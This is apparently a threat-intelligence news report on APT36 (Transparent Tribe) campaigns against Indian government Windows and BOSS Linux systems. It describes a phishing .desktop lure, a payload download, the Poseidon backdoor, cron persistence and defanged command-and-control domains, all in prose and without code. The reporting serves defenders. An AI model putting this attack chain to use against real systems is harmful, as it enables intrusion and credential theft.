Transparent Tribe Expands Attacks to Target Windows and Linux BOSS Systems

The advanced persistent threat (APT) group known as Transparent Tribe (APT36) has been observed expanding its cyber operations to target both Windows and Bharat Operating System Solutions (BOSS) Linux platforms. This marks a significant step in the group’s evolution, showcasing its ability to adapt and diversify attack methods against Indian government entities.

Initial Access and Attack Vectors

According to cybersecurity firm CYFIRMA, the group primarily leverages spear-phishing emails as the initial entry point.

• Windows Environments: Targeted with malicious files disguised as legitimate documents.

• Linux BOSS Systems: Exploited using weaponized .desktop shortcut files, which masquerade as PDFs. Once opened, these files launch shell scripts designed to download and execute payloads from attacker-controlled servers.

The phishing lures often pose as meeting invitations, such as "Meeting_Ltr_ID1543ops.pdf.desktop", crafted to trick recipients into opening them.

Technical Breakdown of the Malware

Once executed, the malicious desktop file initiates a multi-stage attack chain:

1. Shell Script Execution: Downloads a hex-encoded file from a remote server (securestore[.]cv) and saves it as an ELF binary.

2. Decoy Display: Opens a fake PDF from Google Drive to reduce suspicion.

3. Payload Deployment: A Go-based binary communicates with a command-and-control (C2) server (modgovindia[.]space:4000).

4. Persistence Mechanism: Installs a cron job to ensure the malware restarts after reboot.

The payload, identified as Poseidon backdoor, enables data collection, credential harvesting, system reconnaissance, and long-term remote access.

Anti-Analysis and Evasion

The malware is engineered with anti-debugging and sandbox evasion checks. By performing dummy operations, it complicates analysis and reduces detection rates, making it a resilient tool for long-term campaigns.

Broader Campaign and Objectives

Transparent Tribe’s operations are not limited to malware deployment.

• Credential Theft: Spoofed domains are used to harvest government logins and even bypass Kavach, a two-factor authentication system used by Indian agencies.

• Infrastructure Control: By customizing payloads for different operating systems, APT36 increases its ability to persist inside sensitive environments.

• Regional Targeting: While India is the primary focus, related campaigns attributed to South Asian APT groups (like SideWinder) have also been observed striking neighboring countries such as Bangladesh, Nepal, and Sri Lanka.

Significance of the Findings

The campaign highlights several critical takeaways:

• Dual-Platform Targeting: APT36’s ability to attack both Windows and Linux shows a higher degree of sophistication.

• Persistent Threat: By using decoys, custom binaries, and cron jobs, the malware ensures long-term access.

• National Security Risk: Compromise of government systems can lead to exfiltration of classified data, disruption of critical operations, and potential lateral movement across agencies.

Conclusion

The latest Transparent Tribe operations demonstrate the group’s adaptability and persistence in pursuing Indian government entities. By exploiting both Windows and BOSS Linux systems, APT36 is reinforcing its long-standing strategy of targeting critical infrastructure while adopting new tactics to stay ahead of defensive measures.

The findings underline the importance of enhanced phishing awareness, stricter endpoint security controls, and proactive monitoring of government systems to detect and mitigate such state-aligned cyber threats.